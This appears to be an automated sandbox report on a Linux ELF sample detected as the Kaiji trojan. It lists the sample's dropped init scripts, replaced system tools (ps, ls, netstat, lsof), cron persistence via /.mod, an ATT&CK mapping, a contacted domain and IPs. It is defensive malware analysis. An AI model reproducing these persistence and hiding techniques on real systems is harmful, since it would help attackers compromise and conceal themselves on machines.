Source: /usr/sbin/cron (PID: 6412)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 6481)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /usr/bin/dash (PID: 6275)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s			Jump to behavior
Source: /usr/bin/dash (PID: 6276)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.9rMvpBJybs /tmp/tmp.uaBIl5G6jS /tmp/tmp.4dkKp3sm3s			Jump to behavior

Source: /usr/sbin/service (PID: 6270)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior
Source: /usr/sbin/service (PID: 6274)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 6278)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /bin/bash (PID: 6301)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 6306)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.service	Jump to behavior
Source: /bin/bash (PID: 6310)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.service	Jump to behavior
Source: /usr/sbin/service (PID: 6365)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 6368)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 6381)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6384)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/32676	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Shell script file created: /etc/profile.d/bash_cfg.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 6279)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior
Source: /usr/sbin/service (PID: 6382)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	File: /etc/init.d/x11-common	Jump to dropped file

Source: /etc/32676 (PID: 6272)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 6459)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 6540)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior

Source: /usr/bin/sleep (PID: 6272)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 6459)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 6540)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 6383)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 6432)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 6432)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/Ww0lpzmYHO.elf (PID: 6261)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6266)	Queries kernel information via 'uname':	Jump to behavior
Source: /etc/32676 (PID: 6269)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6300)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6333)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6337)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 6413)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 6482)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Stealing of Sensitive Information

Yara detected Kaiji

Source: Yara match

File source: Ww0lpzmYHO.elf, type: SAMPLE

Remote Access Functionality

Yara detected Kaiji

Source: Yara match

File source: Ww0lpzmYHO.elf, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Ww0lpzmYHO.elf	34%	Virustotal		Browse
Ww0lpzmYHO.elf	39%	ReversingLabs	Linux.Trojan.Ares
Ww0lpzmYHO.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/32676	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/binfmt-support	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cron	0%	ReversingLabs
/etc/init.d/cryptdisks	0%	ReversingLabs
/etc/init.d/cryptdisks-early	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/gdm3	0%	ReversingLabs
/etc/init.d/hddtemp	0%	ReversingLabs
/etc/init.d/hwclock.sh	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/iscsid	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/lightdm	0%	ReversingLabs
/etc/init.d/lm-sensors	0%	ReversingLabs
/etc/init.d/lvm2-lvmpolld	0%	ReversingLabs
/etc/init.d/mono-xsp4	0%	ReversingLabs
/etc/init.d/multipath-tools	0%	ReversingLabs
/etc/init.d/open-iscsi	0%	ReversingLabs
/etc/init.d/open-vm-tools	0%	ReversingLabs
/etc/init.d/plymouth	0%	ReversingLabs
/etc/init.d/plymouth-log	0%	ReversingLabs
/etc/init.d/procps	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/rsyslog	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ssh	0%	ReversingLabs
/etc/init.d/udev	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/init.d/x11-common	0%	ReversingLabs
/etc/profile.d/bash_cfg.sh	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.251.116.105	true	false		unknown
ss.us-tv.top	unknown	unknown	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.249.145.219	unknown	United States	16509	AMAZON-02US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.249.145.219	x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	armv4l.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse
	zte.elf	Get hash	malicious	Unknown	Browse
	e1x.x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	amd64.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.42	i486.elf	Get hash	malicious	Mirai, Moobot	Browse
	fish.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse
	xi.arm.elf	Get hash	malicious	Mirai, Moobot	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse
	Mozi.a.elf	Get hash	malicious	Mirai	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse
	ew_for_Linux32	Get hash	malicious	Unknown	Browse
	iSIGHdJefl.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.36
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.186.100
	http://168.63.129.16:32526/vmSettings	Get hash	malicious	Unknown	Browse	142.250.185.228
	https://dareka4te.shop	Get hash	malicious	Unknown	Browse	142.250.186.132
	http://www.thexe.afatydfe.com/	Get hash	malicious	Unknown	Browse	142.250.185.132
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.132
	cPds84vxfC.exe	Get hash	malicious	LummaC, AveMaria, LummaC Stealer, UACMe	Browse	142.250.80.100
	https://predictiveanalyticsgroup.formstack.com/forms/i_am_not_a_robot	Get hash	malicious	Unknown	Browse	216.58.206.36
	SecureMessageATT.html	Get hash	malicious	HTMLPhisher	Browse	142.250.186.132
	Txwd 4063517991 djxjdlxmbk.pdf	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	142.250.185.196

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	i486.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	mipsel.elf	Get hash	malicious	Mirai, Moobot	Browse	185.125.190.26
	fish.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	xi.arm5.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	xi.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	Mozi.a.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	.i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
INIT7CH	i486.elf	Get hash	malicious	Mirai, Moobot	Browse	109.202.202.202
	fish.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	109.202.202.202
	xi.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	109.202.202.202
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	la.bot.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	Mozi.a.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	ew_for_Linux32	Get hash	malicious	Unknown	Browse	109.202.202.202
	iSIGHdJefl.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
AMAZON-02US	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.27
	https://predictiveanalyticsgroup.formstack.com/forms/i_am_not_a_robot	Get hash	malicious	Unknown	Browse	52.217.165.160
	Txwd 4063517991 djxjdlxmbk.pdf	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	18.245.31.89
	https://active-tomato-m9td61.mystrikingly.com/	Get hash	malicious	Unknown	Browse	52.84.150.39
